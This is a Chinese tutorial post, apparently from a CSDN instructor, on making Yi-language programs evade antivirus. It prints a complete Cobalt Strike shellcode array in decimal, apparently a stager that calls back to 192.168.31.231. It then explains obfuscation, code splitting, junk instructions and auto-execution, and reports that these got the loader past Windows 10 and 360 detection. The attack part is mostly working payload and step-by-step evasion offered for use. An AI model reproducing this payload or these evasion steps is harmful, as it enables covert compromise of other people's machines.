很多人说易语言写的程序老是报毒?
那咱们今天就以易语言为例子,讲一讲易语言程序的免杀
先使用kali搭建好内网的cs环境,然后利用cs生成好payload c语言的
因为是c的shellcode 不能直接给易语言调用
在易语言的代码层中,只支持解析十进制的机器码,所以需要把这里的十六进制shellcode转换成十进制才能给易语言调用
这里写一个简单的转换程序
{252,232,137,0,0,0,96,137,229,49,210,100,139,82,48,139,82,12,139,82,20,139,114,40,15,183,74,38,49,255,49,192,172,60,97,124,2,44,32,193,207,13,1,199,226,240,82,87,139,82,16,139,66,60,1,208,139,64,120,133,192,116,74,1,208,80,139,72,24,139,88,32,1,211,227,60,73,139,52,139,1,214,49,255,49,192,172,193,207,13,1,199,56,224,117,244,3,125,248,59,125,36,117,226,88,139,88,36,1,211,102,139,12,75,139,88,28,1,211,139,4,139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,88,95,90,139,18,235,134,93,104,110,101,116,0,104,119,105,110,105,84,104,76,119,38,7,255,213,49,255,87,87,87,87,87,104,58,86,121,167,255,213,233,132,0,0,0,91,49,201,81,81,106,3,81,81,104,80,0,0,0,83,80,104,87,137,159,198,255,213,235,112,91,49,210,82,104,0,2,64,132,82,82,82,83,82,80,104,235,85,46,59,255,213,137,198,131,195,80,49,255,87,87,106,255,83,86,104,45,6,24,123,255,213,133,192,15,132,195,1,0,0,49,255,133,246,116,4,137,249,235,9,104,170,197,226,93,255,213,137,193,104,69,33,94,49,255,213,49,255,87,106,7,81,86,80,104,183,87,224,11,255,213,191,0,47,0,0,57,199,116,183,49,255,233,145,1,0,0,233,201,1,0,0,232,139,255,255,255,47,73,98,90,87,0,53,79,33,80,37,64,65,80,91,52,92,80,90,88,53,52,40,80,94,41,55,67,67,41,55,125,36,69,73,67,65,82,45,83,84,65,78,68,65,82,68,45,65,78,84,73,86,73,82,85,83,45,84,69,83,84,45,70,73,76,69,33,36,72,43,72,42,0,53,79,33,80,37,0,85,115,101,114,45,65,103,101,110,116,58,32,77,111,122,105,108,108,97,47,53,46,48,32,40,99,111,109,112,97,116,105,98,108,101,59,32,77,83,73,69,32,57,46,48,59,32,87,105,110,100,111,119,115,32,78,84,32,54,46,48,59,32,87,79,87,54,52,59,32,84,114,105,100,101,110,116,47,53,46,48,59,32,109,115,110,32,79,112,116,105,109,105,122,101,100,73,69,56,59,69,78,85,83,41,13,10,0,53,79,33,80,37,64,65,80,91,52,92,80,90,88,53,52,40,80,94,41,55,67,67,41,55,125,36,69,73,67,65,82,45,83,84,65,78,68,65,82,68,45,65,78,84,73,86,73,82,85,83,45,84,69,83,84,45,70,73,76,69,33,36,72,43,72,42,0,53,79,33,80,37,64,65,80,91,52,92,80,90,88,53,52,40,80,94,41,55,67,67,41,55,125,36,69,73,67,65,82,45,83,84,65,78,68,65,82,68,45,65,78,84,73,86,73,82,85,83,45,84,69,83,84,45,70,73,76,69,33,36,72,43,72,42,0,53,79,33,80,37,64,65,80,91,52,92,80,90,88,53,52,40,80,94,41,55,67,67,41,55,125,36,69,73,67,65,82,45,83,84,65,78,68,65,82,68,45,65,78,84,73,86,73,82,85,83,45,84,69,83,84,45,70,73,0,104,240,181,162,86,255,213,106,64,104,0,16,0,0,104,0,0,64,0,87,104,88,164,83,229,255,213,147,185,0,0,0,0,1,217,81,83,137,231,87,104,0,32,0,0,83,86,104,18,150,137,226,255,213,133,192,116,198,139,7,1,195,133,192,117,229,88,195,232,169,253,255,255,49,57,50,46,49,54,56,46,51,49,46,50,51,49,0,0,0,0,0}
然后尝试一下加载此shellcode,加载成功,上线了
这里编译后放到目标机上,Windows10 在落地后,也就是静态的情况下并没有被杀
尝试执行该程序后立马被拦截,程序在窗口创建完毕的时候便会开启一个线程去加载shellcode
还有一个原因就是现在的shellcode本身就是明文的,特征太明显了
还有一个点,因为360这个软件杀爹,是把易语言编译的程序统统记录了特征码的
所以这里,个人建议打开易语言自带的花指令 可以起到一个混淆作用
做完以上操作后,这里先尝试一下混淆shellcode跟打乱加载shellcode的代码
这里再尝试把编译后的程序放到目标机上运行
成功的运行,尝试加载shellcode 加载成功 并未拦截
这里知道 通过代码拆分便可以绕过检测
这里尝试让代码自动运行起来,执行程序便加载shellcode
好了,自动加载shellcode
这里给大家解释一下 我为什么要修改窗口标题,然后判断标题再调用按钮函数
因为我如果弄一个固定的值去判断一下,然后调用按钮函数,这是个固定的,编译器就会把这块代码给优化掉,也就是直接删掉,所以这么写 是防止被优化
当然了,此种方式仅仅只是一种很简单的姿势
如果想做到更好的效果,如果是使用cs 建议学一下cs的二改
本人是一名CSDN的小讲师,在后面的几天便会尝试开始录制视频,如果觉得本人写的不错的话,记得关注一下本人的讲师主页!!!不甚感激,https://edu.csdn.net/lecturer/6606
QQ技术交流群:389391578